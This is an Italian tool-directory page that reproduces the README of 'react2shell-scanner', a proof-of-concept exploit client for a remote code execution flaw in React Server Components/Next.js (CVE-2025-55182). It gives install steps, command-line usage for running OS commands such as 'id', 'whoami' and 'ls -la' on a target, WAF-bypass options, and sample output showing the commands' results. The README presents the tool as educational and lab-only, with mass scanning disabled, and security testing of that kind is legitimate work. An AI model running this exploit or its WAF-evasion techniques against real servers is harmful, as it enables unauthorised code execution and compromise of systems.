Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
react2shell-scanner — Rilevamento basato sulla precisione delle vulnerabilità di esecuzione di codice remoto in RSC/Next.js (CVE-2025-55182, CVE-2025-66478) | Kitploit
Strumenti/GitHubGitHub/hidden-investigations/react2shell-scanner
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebBypass WAFPenetration TestingApprendimento e Formazione
GitHubhidden-investigations/react2shell-scanner

react2shell-scanner

Rilevamento basato sulla precisione delle vulnerabilità di esecuzione di codice remoto in RSC/Next.js (CVE-2025-55182, CVE-2025-66478)

Vedi RepositorySito web
537 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

React2Shell Scanner – con PoC

CVE-2025-55182 – React Server Components RCE PoC
Client exploit educativo per il laboratorio React2Shell di Hidden Investigations.

Questo repository contiene uno strumento exploit proof-of-concept (PoC) per un singolo host per la vulnerabilità React2Shell (CVE-2025-55182) che prende di mira applicazioni React Server Components / Next.js configurate in modo errato.

È progettato per essere utilizzato solo contro il laboratorio React2Shell ufficiale di Hidden Investigations o sistemi di cui si possiede esplicitamente o che si amministrano.


⚠️ Dichiarazione legale ed etica

Questo progetto è fornito strettamente per scopi educativi e di ricerca difensiva sulla sicurezza:

  • Utilizza questo strumento solo su:
    • Il laboratorio React2Shell ufficiale di Hidden Investigations, o
    • Sistemi di cui possiedi o hai esplicita autorizzazione scritta per testare.
  • Non puntarlo a siti web casuali, sistemi di produzione o infrastrutture che non controlli.
  • Gli autori e Hidden Investigations non si assumono alcuna responsabilità per uso improprio o danni.

Utilizzando questo strumento, accetti di rispettare tutte le leggi e le normative applicabili.


Caratteristiche

  • 🔥 Client exploit React2Shell per CVE-2025-55182
  • 🎯 Concentrato su singolo host (nessuna scansione di massa)
  • 📡 Supporto per percorsi personalizzati e liste di percorsi
  • 🧪 Modalità controllo sicuro (nessun comando OS, solo un probe di rilevamento)
  • 🪟 Modalità compatibile con Windows (whoami predefinito)
  • 🛡️ Aiutanti per bypass WAF:
    • Campo multipart spazzatura (--waf-bypass, --waf-bypass-size)
    • Modifica del layout Vercel (--vercel-waf-bypass)
  • 🔐 Opzioni TLS (--insecure, intestazioni personalizzate)
  • 🧾 Output JSON (-o/--output, --all-results)
  • 🧘 Output pulito in modalità silenziosa (perfetto per il piping ad altri strumenti)

Requisiti

  • Python: 3.8+ (testato con Python 3.10+)
  • Dipendenze:
    • requests

Installa le dipendenze con:

root@kitploit:~
pip install -r requirements.txt

Installazione

  1. Clona il repository di Hidden Investigations:
root@kitploit:~
git clone https://github.com/hidden-investigations/react2shell-poc.git
cd react2shell-poc
  1. (Opzionale ma consigliato) Crea un virtualenv:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate   # On Windows: venv\Scripts\activate
  1. Installa i requisiti:
root@kitploit:~
pip install -r requirements.txt
  1. Esegui lo strumento:
root@kitploit:~
python3 react2shell-scanner.py -h

Utilizzo

Aiuto di base:

root@kitploit:~
python3 react2shell-scanner.py -h

Lo strumento richiede un URL di destinazione:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000 -c "id"
# or
python3 react2shell-scanner.py --url http://localhost:3000 -c "id"

Se lo esegui senza -t/--target o -u/--url, stampa un messaggio di aiuto con branding ed esce.


Opzioni della riga di comando

Target & percorsi

OpzioneDescrizionePredefinito
-t, --targetURL o dominio di destinazione (obbligatorio a meno che non venga usato --url)Nessuno
-u, --urlAlias per --target (flag stile Assetnote)Nessuno
--pathPercorso da testare (può essere usato più volte, es. /, /_next)/
--path-fileFile contenente i percorsi da testare (uno per riga)Nessuno

Nota: Questo PoC è solo per singolo host. L'opzione -l/--list è presente ma intenzionalmente disabilitata.


Comportamento exploit/payload

OpzioneDescrizionePredefinito
-c, --commandComando da eseguire sul target (quando lo sfruttamento ha successo)id
--safe-checkUsa un payload SAFE_CHECK (nessun comando OS, solo una stringa marcatore)off
--windowsRegola i predefiniti per target Windows (es. usa whoami quando il comando è id)off
--waf-bypassAnteponi un grande campo multipart spazzatura al corpo della richiesta per eludere il WAFoff
--waf-bypass-size KBDimensione del campo spazzatura in KB quando si usa --waf-bypass128
--vercel-waf-bypassUsa un layout multipart alternativo inteso a modificare il comportamento del WAF Vercel (PoC semplificato)off

Opzioni HTTP/TLS

OpzioneDescrizionePredefinito
--timeout SECONDSTimeout della richiesta in secondi15 (o 20 se --waf-bypass e nessun timeout impostato)
-k, --insecureDisabilita la verifica SSL (come curl -k)off
-H, --headerIntestazione personalizzata, es. -H "X-Forwarded-For: 127.0.0.1" (ripetibile)Nessuno

Opzioni di output/UX

OpzioneDescrizionePredefinito
-o, --output FILEScrivi risultati JSON in FILENessuno
--all-resultsQuando si usa --output, includi anche i risultati non vulnerabilioff
-v, --verboseModalità dettagliata – mostra lo stato HTTP e l'intestazione X-Action-Redirectoff
-q, --quietModalità silenziosa – stampa solo l'output del comando normalizzato in caso di successooff
--no-colorDisabilita output colorato nel terminaleoff

Esempio di modalità silenziosa (output bello, multi-linea):

root@kitploit:~
python3 react2shell-scanner.py --url http://localhost:3000 -q -c "ls -la"

Output:

root@kitploit:~
total 12
drwxr-xr-x    1 root     root            10 Dec 13 21:13 .
drwxr-xr-x    1 root     root             0 Dec 13 21:13 ..
drwxr-xr-x    1 nextjs   nodejs          12 Dec 13 21:13 .next
drwxr-xr-x    1 nextjs   nodejs         396 Dec 13 21:13 node_modules
-rw-r--r--    1 nextjs   nodejs         733 Dec 13 21:13 package.json
drwxr-xr-x    1 root     root            12 Dec 13 19:13 public
-rw-r--r--    1 nextjs   nodejs        5661 Dec 13 21:13 server.js

Flag di scansione in blocco (intenzionalmente disabilitati)

I seguenti flag esistono per rispecchiare la CLI di Assetnote, ma non sono implementati in questo PoC per evitare un uso improprio della scansione di massa:

OpzioneStato
-l, --listNon implementato
--threads NNon implementato

Se usi -l/--list, lo strumento stamperà un avviso e uscirà, suggerendo di usare lo react2shell-scanner originale di Assetnote per scansioni sicure su larga scala.


Esempi

Esegui contro il laboratorio locale:

root@kitploit:~
python3 react2shell-scanner.py --url http://localhost:3000 -c "whoami"

Usa bypass WAF con un campo spazzatura più grande:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --waf-bypass --waf-bypass-size 256   -c "id"

Percorsi multipli sullo stesso host:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path /   --path /_next/data   -c "id"

Percorsi da file:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path-file paths.txt   -c "id"

Modalità controllo sicuro (nessun comando OS eseguito):

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000 --safe-check

Output JSON dei risultati su file:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path / --path /_next   -c "id"   -o results.json --all-results

Formato output JSON

Quando si usa -o/--output, lo strumento scrive un array di oggetti come:

root@kitploit:~
[
  {
    "url": "http://localhost:3000/",
    "path": "/",
    "success": true,
    "status": "success",
    "output": "uid=1000(nextjs) gid=1000(nodejs) groups=1000(nodejs)",
    "http": {
      "status_code": 302,
      "headers": {
        "X-Action-Redirect": "NEXT_REDIRECT;push;/login?a=uid%3D1000%28nextjs%29;307;",
        "...": "..."
      }
    }
  }
]

Crediti e Riconoscimenti

  • Hidden Investigations – per aver pubblicato il laboratorio educativo React2Shell e il client PoC.
  • @sakibulalikhan – autore dello strumento.
  • Assetnote – ispirazione per le idee di bypass WAF tramite il loro react2shell-scanner.

Licenza

Questo progetto è concesso in licenza secondo i termini della Licenza MIT. Vedi LICENSE per i dettagli.

📬 Contattaci: [email protected]

Scarica lo strumento